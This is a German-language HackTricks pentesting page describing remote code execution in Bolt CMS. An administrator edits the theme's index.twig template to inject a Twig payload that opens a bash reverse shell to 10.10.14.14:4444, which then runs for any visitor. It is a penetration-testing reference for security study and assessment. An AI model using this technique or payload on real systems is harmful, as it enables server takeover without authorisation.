Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-web/bolt-cms.md
Translator workflow 6af5d4e1a0 Translated to German
2024-02-10 15:36:32 +00:00

3.7 KiB
Raw Blame History

Bolt CMS

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

RCE

Nach dem Anmelden als Administrator (gehen Sie zu /bot, um auf die Anmeldemaske zuzugreifen), können Sie RCE in Bolt CMS erhalten:

  • Wählen Sie Konfiguration -> Konfiguration anzeigen -> Hauptkonfiguration oder gehen Sie zum URL-Pfad /bolt/file-edit/config?file=/bolt/config.yaml
  • Überprüfen Sie den Wert des Themas
  • Wählen Sie Dateiverwaltung -> Vorlagen anzeigen und bearbeiten
  • Wählen Sie das im vorherigen Schritt gefundene Basisthema (base-2021 in diesem Fall) und wählen Sie index.twig
  • In meinem Fall befindet sich dies im URL-Pfad /bolt/file-edit/themes?file=/base-2021/index.twig
  • Setzen Sie Ihre Payload in dieser Datei über Template-Injection (Twig), z.B.: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
  • Und speichern Sie die Änderungen
  • Löschen Sie den Cache in Wartung -> Cache löschen
  • Greifen Sie erneut auf die Seite als regulärer Benutzer zu, und die Payload sollte ausgeführt werden
Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen: